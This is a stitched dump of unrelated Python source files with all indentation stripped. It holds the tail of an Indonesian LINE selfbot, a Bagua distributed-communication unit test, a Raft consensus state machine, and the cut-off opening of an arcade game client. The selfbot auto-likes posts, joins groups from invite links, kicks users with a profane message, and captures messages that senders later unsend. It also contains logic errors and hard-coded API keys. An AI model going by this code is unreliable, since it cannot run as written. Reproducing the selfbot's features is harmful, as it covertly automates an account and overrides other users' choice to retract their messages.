txt = text.replace(sep[0] + " ","")
url = "https://rest.farzain.com/api/cooltext.php?text={}&apikey=nda123".format(txt)
line.sendImageWithURL(to, url)
elif text.startswith("Anu "):
txt = text.replace("Anu ","")
url = "https://rest.farzain.com/api/special/fansign/indo/viloid.php?apikey=nda123&text={}".format(txt)
line.sendImageWithURL(to, url)
elif text.lower() == "kontak me":
line.sendMessage(to, "Nama mu : " + line.getContact(sender).displayName + "\n\nBio mu : \n" + line.getContact(sender).statusMessage + "\n\nLink profil mu :\nhttp://dl.profile.line-cdn.net/" + line.getContact(sender).pictureStatus)
line.sendMessage(to, "Mid mu : \n" + sender)
elif text.lower() == "info me":
status = ["Status Kehidupan : Menjomblo", "Status Kehidupan : Menjones", "Status Kehidupan : Menikah", "Status Kehidupan : Menyendiri"]
muka = ["Wajah : Jelek dekil", "Wajah : Cantik", "Wajah : Bengkok", "Wajah : Item mutung", "Wajah : Rata"]
jenis = ["Jenis kelamin : Laki - laki", "Jenis kelamin : Perempuan", "Jenis kelamin : Waria", "Jenis kelamin : Tidak punya"]
line.sendMessage(to, "Nama : " + line.getContact(msg._from).displayName + "\n" + random.choice(jenis) + "\n" + random.choice(muka) + "\n" + random.choice(status))
elif text.startswith("Smule "):
proses = text.split(" ")
urutan = text.replace(proses[0] + " ","")
count = urutan.split("-")
search = str(count[0])
r = requests.get("https://www.smule.com/"+search+"/performances/json")
data = json.loads(r.text)
if len(count) == 1:
no = 0
ret_ = "Record Smule:\n"
for aa in data["list"]:
no += 1
ret_ += "\n" + str(no) + ". " + str(aa["title"])
ret_ += "\n\nSelanjutnya ketik: smule {}-nomor\nuntuk melihat detailnya. ".format(str(search))
line.sendMessage(msg.to,ret_)
elif len(count) == 2:
try:
num = int(count[1])
b = data["list"][num - 1]
smule = str(b["web_url"])
c = "Judul Oc: "+str(b["title"])
c += "\nPembuat: "+str(b["owner"]["handle"])
c += "\nTotal like: "+str(b["stats"]["total_loves"])+" like"
c += "\nTotal comment: "+str(b["stats"]["total_comments"])+" comment"
c += "\nStatus VIP: "+str(b["owner"]["is_vip"])
c += "\nStatus Oc: "+str(b["message"])
c += "\nCreated Oc: {}".format(b["created_at"][:10])
c += "\nDidengarkan: {}".format(b["stats"]["total_listens"])+" orang"
hasil = "Detail Record\n\n"+str(c)
dl = str(b["cover_url"])
line.sendImageWithURL(msg.to,dl)
line.sendMessage(msg.to, hasil, {'AGENT_NAME': ' URL Smule','AGENT_LINK': 'https://www.smule.com/{}'.format(str(b['owner']['handle'])),'AGENT_ICON': 'https://png.icons8.com/color/50/000000/speaker.png' })
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
r = s.get("https://sing.salon/smule-downloader/?url=https://www.smule.com{}".format(urllib.parse.quote(smule)))
data = BeautifulSoup(r.content, 'html5lib')
get = data.select("a[href*=https://www.smule.com/redir?]")[0]
title = data.findAll('h2')[0].text
imag = data.select("img[src*=https://www.smule.com/redir?]")[0]
if 'Smule.m4a' in get['download']:
line.sendMessage(msg.to,"Type: Audio\n\nPlease wait for audio...")
line.sendAudioWithURL(msg.to, get['href'])
else:
line.sendMessage(msg.to,"Type: Video\n\nPlease wait for video...")
line.sendVideoWithURL(msg.to, get['href'])
except Exception as e:
line.sendMessage(msg.to,"Result Error:\n"+str(e))
elif text.startswith("Ceksmule "):
sep = text.split(" ")
search = text.replace(sep[0] + " ","")
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("https://www.smule.com/{}".format(urllib.parse.quote(search)))
gunakan = BeautifulSoup(r.content, 'html5lib')
for getinfosmule in gunakan.findAll('script',{'type':'text/javascript'})[1]:
getJsonSmule = re.search(r'DataStore.Pages.Profile\s*=\s*(\{.+\})\s*;', getinfosmule).group(1)
data = json.loads(getJsonSmule)
for smuleProfile in data:
ret_ = "Profile Smule:\n"
ret_ += "\n• Id Smule: @{}".format(str(data["user"]["handle"]))
ret_ += "\n• Total Rekaman: {} record".format(str(data["user"]["num_performances"]))
ret_ += "\n• Pengikut: {} orang".format(str(data["user"]["followers"]))
ret_ += "\n• Mengikuti: {} orang".format(str(data["user"]["followees"]))
ret_ += "\n• Bio: {}".format(str(data["user"]["blurb"]))
if data["user"]["is_verified"] == True:
ret_ += "\n• Verifikasi: Sudah"
else:
ret_ += "\n• Verifikasi: Belum"
if data["user"]["is_vip"] == True:
ret_ += "\n• Akun VIP: Iya"
else:
ret_ += "\n• Akun VIP: Tidak"
path = data["user"]["pic_url"]
name = "INFO PROFILE SMULE"
url = "https://www.smule.com/{}".format(search)
iconlink = data["user"]["pic_url"]
line.sendMessage(to, str(ret_))
line.sendImageWithURL(msg.to, str(path))
#======
elif text.lower() == '.bye':
if msg.toType == 2:
ginfo = line.getGroup(msg.to)
try:
line.sendMessage(msg.to,"Bye! " + str(ginfo.name))
line.leaveGroup(msg.to)
except:
pass
#____________________________________
elif "image: " in msg.text.lower():
separate = msg.text.split(" ")
search = msg.text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("http://rahandiapi.herokuapp.com/imageapi?key=betakey&q={}".format(urllib.parse.quote(search)))
data = r.text
data = json.loads(data)
if data["result"] != []:
items = data["result"]
path = random.choice(items)
a = items.index(path)
b = len(items)
line.sendImageWithURL(to, str(path))
elif "youtube" in msg.text.lower():
if msg._from in lineMID:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
best = vid.getbest()
best.resolution, best.extension
for s in stream:
me = best.url
hasil = ""
title = "💿 Judul 🎼〘 " + vid.title + " 〙"
author = '\n\n✏ Author : ' + str(vid.author)
durasi = '\n📟 Duration : ' + str(vid.duration)
suka = '\n👍 Likes : ' + str(vid.likes)
rating = '\n⭐ Rating : ' + str(vid.rating)
deskripsi = '\n📋 Deskripsi : ' + str(vid.description)
line.sendVideoWithURL(msg.to, me)
line.sendMessage(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
except Exception as e:
line.sendMessage(msg.to,str(e))
elif msg.contentType == 7:
if settings["checkSticker"] == True:
stk_id = msg.contentMetadata['STKID']
stk_ver = msg.contentMetadata['STKVER']
pkg_id = msg.contentMetadata['STKPKGID']
ret_ = "╔══[ Sticker Info ]"
ret_ += "\n╠ STICKER ID : {}".format(stk_id)
ret_ += "\n╠ STICKER PACKAGES ID : {}".format(pkg_id)
ret_ += "\n╠ STICKER VERSION : {}".format(stk_ver)
ret_ += "\n╠ STICKER URL : line://shop/detail/{}".format(pkg_id)
ret_ += "\n╚══[ Finish ]"
line.sendMessage(to, str(ret_))
elif settings["contact"] == True:
msg.contentType = 0
line.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = line.getContact(msg.contentMetadata["mid"])
try:
cu = line.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
line.sendMessage(to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = line.getContact(msg.contentMetadata["mid"])
try:
cu = line.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
line.sendMessage(to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 1:
if settings["changePicture"] == True:
path = line.downloadObjectMsg(msg_id)
settings["changePicture"] = False
line.updateProfilePicture(path)
line.sendMessage(to, "Berhasil mengubah foto profile")
if msg.toType == 2:
if to in settings["changeGroupPicture"]:
path = line.downloadObjectMsg(msg_id)
settings["changeGroupPicture"].remove(to)
line.updateGroupPicture(to, path)
line.sendMessage(to, "Berhasil mengubah foto group")
elif msg.contentType == 16:
mid = data["actorId"]
postId = data["activityExternalId"]
line.likePost(to, mid, postId, likeType=1001)
line.createComment(to, mid, postId, "AutoLike by: Team Dkz Protection ")
#==============================================================================#
if op.type == 17:
if op.param1 in welcome:
if op.param2 in lineMID:
pass
ginfo = line.getGroup(op.param1)
contact = line.getContact(op.param2).picturePath
image = 'http://dl.profile.line.naver.jp'+contact
welcomeMembers(op.param1, [op.param2])
line.sendImageWithURL(op.param1, image)
if op.type == 13:
if lineMID in op.param3:
if settings["autojj"] == "wl":
if op.param2 in periksa["wl"]:
line.acceptGroupInvitation(op.param1)
else:
if settings['autorejc'] == True:
line.rejectGroupInvitation(op.param1)
else:
pass
elif settings["autojj"] == "all":
line.acceptGroupInvitation(op.param1)
else:
if settings['autorejc'] == True:
line.rejectGroupInvitation(op.param1)
else:
pass
if op.type == 26:
if wait["Mute"] == False:
print ("[ 26 ] RECEIVE MESSAGE")
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0:
if sender != line.profile.mid:
to = sender
if settings["autoBalas"] == True:
if msg.toType == 0:
line.sendChatChecked(sender,msg_id)
contact = line.getContact(sender)
mids = [contact.mid]
text = "[ Auto Respon ]\n\nHallo @!\nMohon Maaf Saya Sedang Sibuk, Ini Adalah Pesan Otomatis, Jika Ada Yang Penting Mohon Hubungi Saya Nanti, Terimakasih..."
summon(op.param1)
else:
to = receiver
else:
to = receiver
if msg.contentType == 0:
if settings["autoRead"] == True:
line.sendChatChecked(to, msg_id)
if to in read["readPoint"]:
if sender not in read["ROM"][to]:
read["ROM"][to][sender] = True
if sender in settings["mimic"]["target"] and settings["mimic"]["status"] == True and settings["mimic"]["target"][sender] == True:
text = msg.text
if text is not None:
line.sendMessage(msg.to,text)
if settings["unsendMessage"] == True:
try:
msg = op.message
if msg.toType == 0:
line.log("[{} : {}]".format(str(msg._from), str(msg.text)))
else:
line.log("[{} : {}]".format(str(msg.to), str(msg.text)))
msg_dict[msg.id] = {"text": msg.text, "from": msg._from, "createdTime": msg.createdTime, "contentType": msg.contentType, "contentMetadata": msg.contentMetadata}
except Exception as error:
logError(error)
if msg.contentType == 0:
if text is None:
return
if "/ti/g/" in msg.text.lower():
if settings["autoJoinTicket"] == True:
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
group = line.findGroupByTicket(ticket_id)
line.acceptGroupInvitationByTicket(group.id,ticket_id)
line.sendMessage(to, "Berhasil join ke group %s" % str(group.name))
#___________________RESPON TEXT__________________
if msg.contentType == 0 and sender not in lineMID and msg.toType == 2:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if lineMID in mention["M"]:
if settings["autoRespon"]:
contact = line.getContact(sender)
line.sendMessage(to, settings["tag"])
break
#___________________RESPON KICKTAG_________________
if msg.contentType == 0 and sender not in lineMID and msg.toType == 2:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if lineMID in mention["M"]:
if settings["autoKick"]:
contact = line.getContact(sender)
jp = line.getContact(sender).displayName
line.sendMessage(to, "Please SHUT THE FUCK UP")
line.kickoutFromGroup(msg.to,[sender])
break
#___________________RESPON IMAGE_________________
if msg.contentType == 0 and sender not in lineMID and msg.toType == 2:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if lineMID in mention["M"]:
if settings["autoResponImage"]:
contact = line.getContact(sender)
anu = contact.displayName
path = "http://dl.profile.line.naver.jp/" + contact.pictureStatus
line.sendMessage(to, settings["tag2"])
line.sendImageWithURL(msg.to, str(path))
break
#___________________RESPON PM________________
if msg.contentType == 0 and sender not in lineMID and msg.toType == 2:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if lineMID in mention["M"]:
if settings["autoResponPm"]:
contact = line.getContact(sender)
line.sendMessage(sender, settings["tag3"])
break
#___________________________
if msg.contentType == 0 and sender not in lineMID and msg.toType == 2:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if lineMID in mention["M"]:
if msg.to in responPc:
G = line.getGroup(to)
contact = line.getContact(sender)
anu = contact.displayName
#sid = str(tikel["sid"])
#spkg = str(tikel["spkg"])
anu = contact.displayName
line.sendMessage(sender, settings["responpc"])
#line.sendSticker(sender, spkg, sid)
break
if op.type == 26:
print ("[ 26 ] RECEIVE MESSAGE")
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0:
if sender != line.profile.mid:
to = sender
else:
to = receiver
else:
to = receiver
if settings["autoRead"] == True:
line.sendChatChecked(to, msg_id)
if to in read["readPoint"]:
if sender not in read["ROM"][to]:
read["ROM"][to][sender] = True
if sender in settings["mimic"]["target"] and settings["mimic"]["status"] == True and settings["mimic"]["target"][sender] == True:
text = msg.text
if text is not None:
line.sendMessage(msg.to,text)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
line.likePost(url[25:58], url[66:], likeType=1001)
line.createComment(url[25:58], url[66:], wait["comment1"])
line.sendMessage(msg.to, "╭═════════════════╮\n » ᴅᴇᴛᴇᴄᴛ ᴘᴏsᴛ ʙʏ: ᴛᴇᴀᴍ ᴅᴋᴢ\n » ᴀᴜᴛᴏʟɪᴋᴇ ʜᴀs ʙᴇᴇɴ sᴇɴᴛ\n╰═════════════════╯")
if op.type == 65:
if wait["unsend"] == True:
try:
at = op.param1
msg_id = op.param2
if msg_id in msg_dict1:
if msg_dict1[msg_id]["from"]:
ginfo = cl.getGroup(at)
ryan = cl.getContact(msg_dict1[msg_id]["from"])
ret_ = "「 Sticker Dihapus 」\n"
ret_ += "• Pengirim : {}".format(str(ryan.displayName))
ret_ += "\n• Nama Grup : {}".format(str(ginfo.name))
ret_ += "\n• Waktu Ngirim : {}".format(dt_to_str(cTime_to_datetime(msg_dict1[msg_id]["createdTime"])))
ret_ += "{}".format(str(msg_dict1[msg_id]["text"]))
cl.sendMessage(at, str(ret_))
cl.sendImage(at, msg_dict1[msg_id]["data"])
del msg_dict1[msg_id]
except Exception as e:
print(e)
#==============================================================================#
if op.type == 55:
print ("[ 55 ] NOTIFIED READ MESSAGE")
try:
if op.param1 in read['readPoint']:
if op.param2 in read['readMember'][op.param1]:
pass
else:
read['readMember'][op.param1] += op.param2
read['ROM'][op.param1][op.param2] = op.param2
backupData()
else:
pass
except:
pass
#==============================================================================#
if op.type == 55:
if cctv['cyduk'][op.param1]==True:
if op.param1 in cctv['point']:
Name = line.getContact(op.param2).displayName
if Name in cctv['sidermem'][op.param1]:
pass
else:
cctv['sidermem'][op.param1] += "\n☛ " + Name
summon(op.param1,[op.param2])
line.sendMessage(op.param1,settings["mention"])
ginfo = line.getGroup(op.param1)
contact = line.getContact(op.param2).picturePath
image = 'http://dl.profile.line.naver.jp'+contact
line.sendImageWithURL(op.param1, image)
if op.type == 26:
msg = op.message
if msg.to in settings["simiSimi"]:
if settings["simiSimi"][msg.to] == True:
if msg.text is not None:
text = msg.text
r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + "&key=beta1.nt")
data = r.text
data = json.loads(data)
if data['status'] == 200:
if data['result']['result'] == 100:
line.sendMessage(msg.to, "[̟]: " + data['result']['response'].encode('utf-8'))
except Exception as error:
logError(error)
#==============================================================================#
def autolike():
count = 1
while True:
try:
for posts in line.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
line.likePost(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
print ("Like")
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
line.createComment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread2 = threading.Thread(target=autolike)
thread2.daemon = True
thread2.start()
def autoLike():
count = 1
while True:
try:
# for posts in cl.getFeed(postLimit=10, commentLimit=1, likeLimit=1, order='TIME')["result"]["feed"]:
if hasil["postInfo"]["homeId"]["postId"] is False:
if wait["sukaPost"] == True:
line.likePost(hasil["userMid"]["writerMid"], hasil["postInfo"]["postId"], likeType=1001)
print ("Like")
if wait["commentOn"] == True:
if hasil["homeId"]["writerMid"] in wait["commentBlack"]:
pass
else:
line.createComment(posts["userMid"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
def autoLiked():
#if settings["sukaPost"] == True:
lastTimeLiking = time.time()
if time.time() - lastTimeLiking >= 60*60:
listLikeType = 1001
myComment = "[ Auto Like by: Team Dkz Protection ]"
feed = client.getFeed()
if feed["message"] != 'succes':
lastTimeLiking = time.time()
return True
del feed["result"]["feedInfos"]
result = ["result"]["feeds"]
for res in result:
postInfo = res["post"]["postInfo"]
homeId = postInfo["homeId"]
postId = postInfo["postId"]
likeStat = postInfo["liked"]
if likeStat == True:
continue
else:
line.likePost(homeId, postId, listLikeType)
line.createComment(homeId, postId, myComment)
lastTimeLiking = time.time()
thread1 = threading.Thread(target=autoLike)
thread1.daemon = True
thread1.start()
while True:
try:
Ops = line.poll.fetchOperations(line.revision, 50)
for op in Ops:
if op.type != 0:
line.revision = max(line.revision, op.revision)
lineBot(op)
except Exception as E:
E = str(E)
if "reason=None" in E:
print (E)
time.sleep(60)
restart_program()
|
test_communicator.py
|
import unittest
import torch
import os
from bagua.torch_api.communication import (
_get_default_group,
allreduce,
allreduce_inplace,
send,
recv,
allgather,
barrier,
broadcast_object,
reduce,
reduce_inplace,
reduce_scatter,
reduce_scatter_inplace,
ReduceOp,
)
from tests.internal.common_utils import find_free_port
import multiprocessing
import bagua.torch_api as bagua
import threading
import time
from tests import skip_if_cuda_not_available
class Result(object):
def __init__(self):
self.ret = torch.Tensor([False]).bool()
self.data = torch.Tensor([0.0])
def init_env(rank, env):
os.environ["WORLD_SIZE"] = env["WORLD_SIZE"]
os.environ["LOCAL_WORLD_SIZE"] = env["LOCAL_WORLD_SIZE"]
os.environ["MASTER_ADDR"] = env["MASTER_ADDR"]
os.environ["MASTER_PORT"] = env["MASTER_PORT"]
os.environ["BAGUA_SERVICE_PORT"] = env["BAGUA_SERVICE_PORT"]
os.environ["RANK"] = str(rank)
os.environ["LOCAL_RANK"] = str(rank)
# init bagua distributed process group
torch.cuda.set_device(rank)
bagua.init_process_group()
def run_abort(rank, nprocs, results, env):
init_env(rank, env)
os.environ["NCCL_PROTO"] = "^LL128"
comm_stream = torch.cuda.Stream()
comm = _get_default_group().get_global_communicator()
def abort():
time.sleep(10)
comm.abort()
threading.Thread(target=abort).start()
with torch.cuda.stream(comm_stream):
data = torch.rand(10).cuda()
for _ in range(rank + 1):
comm.allreduce_inplace(
data.ensure_bagua_tensor().bagua_backend_tensor(), ReduceOp.AVG
)
comm_stream.synchronize()
def run_allreduce(rank, nprocs, results, env):
init_env(rank, env)
send_tensor = torch.rand(100).cuda()
recv_tensor = torch.zeros_like(send_tensor)
tensor = send_tensor.clone()
allreduce(send_tensor, recv_tensor)
torch.distributed.all_reduce(tensor)
results[rank].ret[0] = torch.equal(recv_tensor, tensor)
def run_p2p(rank, nprocs, results, env):
init_env(rank, env)
send_tensor = torch.rand(100).cuda()
recv_tensor = torch.zeros_like(send_tensor)
if rank % 2 == 0:
send(send_tensor, dst=(rank + 1) % nprocs)
results[rank].data.copy_(torch.norm(send_tensor))
else:
recv(recv_tensor, src=(rank - 1 + nprocs) % nprocs)
results[rank].data.copy_(torch.norm(recv_tensor))
def run_allgather(rank, nprocs, results, env):
init_env(rank, env)
send_tensor = torch.rand(100).cuda()
recv_tensor = torch.zeros(
[nprocs, 100], device=send_tensor.device, dtype=send_tensor.dtype
)
tensor = send_tensor.clone()
tensor_list = [torch.zeros_like(tensor) for _ in range(nprocs)]
allgather(send_tensor, recv_tensor)
torch.distributed.all_gather(tensor_list, tensor)
ret = True
for i in range(nprocs):
ret = ret and torch.equal(recv_tensor[i], tensor_list[i])
results[rank].ret[0] = ret
def run_barrier(rank, nprocs, results, env):
init_env(rank, env)
barrier()
def run_bcastobject(rank, nprocs, results, env):
init_env(rank, env)
if rank == 0:
state_dict = {"lr": 0.02, "weight_decay": 1e-4, "momentum": 0.9}
else:
state_dict = {}
state_dict = broadcast_object(state_dict, 0)
ret = True
for i in range(nprocs):
ret = (
state_dict["lr"] == 0.02
and state_dict["weight_decay"] == 1e-4
and state_dict["momentum"] == 0.9
)
results[rank].ret[0] = ret
def run_avg(rank, nprocs, results, env):
init_env(rank, env)
def reduce_fn(send_tensor, recv_tensor, op):
reduce(send_tensor, recv_tensor, 0, op)
def reduce_inplace_fn(tensor, op):
reduce_inplace(tensor, 0, op)
fns = [reduce_fn, allreduce]
inplace_fns = [reduce_inplace_fn, allreduce_inplace]
succ = True
for fn in fns:
send_tensor = torch.rand(100).cuda()
recv_tensor = torch.zeros_like(send_tensor)
send_tensor_clone = send_tensor.clone().detach()
recv_tensor_clone = recv_tensor.clone().detach()
fn(send_tensor, recv_tensor, op=ReduceOp.AVG)
fn(send_tensor_clone, recv_tensor_clone, op=ReduceOp.SUM)
recv_tensor_clone /= nprocs
torch.cuda.synchronize()
succ = succ and torch.equal(recv_tensor, recv_tensor_clone)
for fn in inplace_fns:
tensor = torch.rand(100).cuda()
tensor_clone = tensor.clone().detach()
fn(tensor, op=ReduceOp.AVG)
fn(tensor_clone, op=ReduceOp.SUM)
tensor_clone /= nprocs
torch.cuda.synchronize()
succ = succ and torch.equal(tensor, tensor_clone)
results[rank].ret[0] = succ
def run_reduce_scatter(rank, nprocs, results, env):
init_env(rank, env)
send_tensor = torch.rand(100 * nprocs).cuda()
recv_tensor = torch.rand(100).cuda()
send_tensor_clone = send_tensor.clone().detach()
recv_tensor_clone = recv_tensor.clone().detach()
reduce_scatter(send_tensor, recv_tensor, op=ReduceOp.AVG)
reduce_scatter(send_tensor_clone, recv_tensor_clone, op=ReduceOp.SUM)
recv_tensor_clone /= nprocs
tensor = torch.rand(100 * nprocs).cuda()
tensor_clone = tensor.clone().detach()
reduce_scatter_inplace(tensor, op=ReduceOp.AVG)
reduce_scatter_inplace(tensor_clone, op=ReduceOp.AVG)
tensor_clone /= nprocs
torch.cuda.synchronize()
results[rank].ret[0] = torch.equal(recv_tensor, recv_tensor_clone) and torch.equal(
tensor, tensor_clone
)
class TestCommunication(unittest.TestCase):
def run_test_locally(self, fn):
nprocs = torch.cuda.device_count()
env = {
"WORLD_SIZE": str(nprocs),
"LOCAL_WORLD_SIZE": str(nprocs),
"MASTER_ADDR": "127.0.0.1",
"MASTER_PORT": str(find_free_port(8000, 8100)),
"BAGUA_SERVICE_PORT": str(find_free_port(9000, 9100)),
}
mp = multiprocessing.get_context("spawn")
results = [Result() for _ in range(nprocs)]
processes = []
for i in range(nprocs):
p = mp.Process(
target=fn,
args=(i, nprocs, results, env),
)
p.start()
processes.append(p)
for p in processes:
p.join(timeout=60)
self.assertTrue(p.exitcode == 0)
return results
@skip_if_cuda_not_available()
def test_abort(self):
self.run_test_locally(run_abort)
@skip_if_cuda_not_available()
def test_allreduce(self):
results = self.run_test_locally(run_allreduce)
for ret in results:
self.assertTrue(ret.ret.item())
@skip_if_cuda_not_available()
def test_p2p(self):
results = self.run_test_locally(run_p2p)
i = 1
while i < len(results):
self.assertTrue(torch.equal(results[i].data, results[i - 1].data))
i += 2
@skip_if_cuda_not_available()
def test_allgather(self):
results = self.run_test_locally(run_allgather)
for ret in results:
self.assertTrue(ret.ret.item())
@skip_if_cuda_not_available()
def test_barrier(self):
self.run_test_locally(run_barrier)
@skip_if_cuda_not_available()
def test_bcastobject(self):
self.run_test_locally(run_bcastobject)
@skip_if_cuda_not_available()
def test_avg(self):
self.run_test_locally(run_avg)
@skip_if_cuda_not_available()
def test_reduce_scatter(self):
self.run_test_locally(run_reduce_scatter)
if __name__ == "__main__":
unittest.main()
|
state.py
|
import random
from abc import ABC
from functools import reduce
from threading import Thread, Event
HEARTBEAT_TIMEOUT = 0.01
ELECTION_TIMEOUT = 0.5, 1.0
class State(ABC):
def __init__(self, server):
from server import SurfstoreServer
self.server: SurfstoreServer = server
self.majority = self.server.num_servers // 2 + 1
self.stop_event = Event()
def stop(self):
self.stop_event.set()
def on_AppendEntries(self):
pass
def on_RequestVote(self):
pass
class Follower(State):
def __init__(self, server):
super().__init__(server)
self.received_reponse = False # Locked by self.server.lock
Thread(target=self.convert_to_candidate, daemon=True).start()
@property
def timeout(self):
return random.uniform(ELECTION_TIMEOUT[0], ELECTION_TIMEOUT[1])
def convert_to_candidate(self):
while not self.stop_event.wait(self.timeout):
with self.server.lock:
if not self.received_reponse:
print(
f'{self.server.id} {self.server.current_term} {self} convert_to_candidate(): become candidate')
self.server.transit_state(Candidate)
break
self.received_reponse = False
def on_AppendEntries(self):
self.received_reponse = True
def on_RequestVote(self):
self.received_reponse = True
def __repr__(self):
return "Follower"
class Candidate(State):
def __init__(self, server):
super().__init__(server)
Thread(target=self.elect_leader, daemon=True).start()
@property
def timeout(self):
return random.uniform(ELECTION_TIMEOUT[0], ELECTION_TIMEOUT[1])
def elect_leader(self):
while True:
# preempt response to AppendEntries and RequestVote
# no dead lock because we do not send RequestVote to self
# should work because if AppendEntries, RequestVote pending:
# 1. this round of election should fail
# 2. after this round of election, timer should be canceled
with self.server.lock:
self.server.current_term += 1
print(f'{self.server.id} {self.server.current_term} {self} elect_leader()')
# vote for self
self.server.voted_for = self.server.id
votes = 1
latest_term = self.server.current_term
for server_id, proxy in self.server.proxies.items():
try:
term, vote_granted = proxy.requestVote(self.server.current_term, self.server.id,
len(self.server.logs),
self.server.logs[-1][0] if self.server.logs else 0)
except OSError:
continue
latest_term = max(latest_term, term)
votes += vote_granted
if votes >= self.majority:
self.server.transit_state(Leader)
break
elif latest_term > self.server.current_term:
self.server.current_term = latest_term
self.server.voted_for = None
self.server.transit_state(Follower)
break
if self.stop_event.wait(self.timeout):
break
def __repr__(self):
return "Candidate"
class Leader(State):
def __init__(self, server):
super().__init__(server)
self.next_indexes = {server_id: len(self.server.logs) + 1
for server_id in server.proxies.keys() if server_id != server.id}
self.match_indexes = {server_id: 0 for server_id in server.proxies.keys() if server_id != server.id}
Thread(target=self.append_entry, daemon=True).start()
@property
def timeout(self):
return HEARTBEAT_TIMEOUT
def append_entry(self):
while True:
entries = {server_id: [] for server_id in self.next_indexes.keys()}
with self.server.lock:
for server_id, next_index in self.next_indexes.items():
# if last log index >= next_index for a follower, call appendEntry RPC
if len(self.server.logs) >= next_index:
entries[server_id] = self.server.logs[next_index - 1:]
latest_term = self.server.current_term
num_up = 1 # count self
for server_id, proxy in self.server.proxies.items():
prev_index = self.next_indexes[server_id] - 1
prev_term = self.server.logs[prev_index - 1][0] if prev_index else 0
try:
term, successful = proxy.appendEntries(self.server.current_term, prev_index, prev_term,
entries[server_id], self.server.commit_index)
except OSError:
continue
latest_term = max(latest_term, term)
# update indexes if succeed, else decrement next_index then retry
if successful:
self.next_indexes[server_id] = len(self.server.logs) + 1
self.match_indexes[server_id] = len(self.server.logs)
num_up += 1
elif term != -1:
self.next_indexes[server_id] -= 1
num_up += 1
self.server.num_up = num_up
# update commit_index if a log is replicated on majority of servers and is in self.currentTerm
for follower_commit in range(max(self.match_indexes.values()), self.server.commit_index, -1):
num = reduce(lambda n, match_index: n + (follower_commit <= match_index),
self.match_indexes.values(), 0)
# leader already append entry, num >= self.majority - 1 is enough
if num >= self.majority - 1 and self.server.logs[follower_commit - 1][
0] == self.server.current_term:
self.server.commit_index = follower_commit
break
if latest_term > self.server.current_term:
self.server.current_term = latest_term
self.server.transit_state(Follower)
break
if self.stop_event.wait(self.timeout):
break
def __repr__(self):
return "Leader"
|
client03-empty.py
|
import copy
import logging
import asyncio
import threading
import time
from collections import deque
from dataclasses import asdict
from typing import Dict
import zmq
from zmq.asyncio import Context, Socket
import arcade
from pymunk.vec2d import Vec2d
from demos.movement import KeysPressed, MOVE_MAP, apply_movement
from .lib02 import PlayerEvent, PlayerState, GameState
logger = logging.getLogger(__name__)
logger.setLevel('INFO')
SCREEN_WIDTH = 800
SCREEN_HEIGHT = 600
RECT_WIDTH = 50
RECT_HEIGHT = 50
MOVEMENT_SPEED = 5
UPDATE_TICK = 30
class Rectangle:
def __init__(self, x, y, color, filled=True):
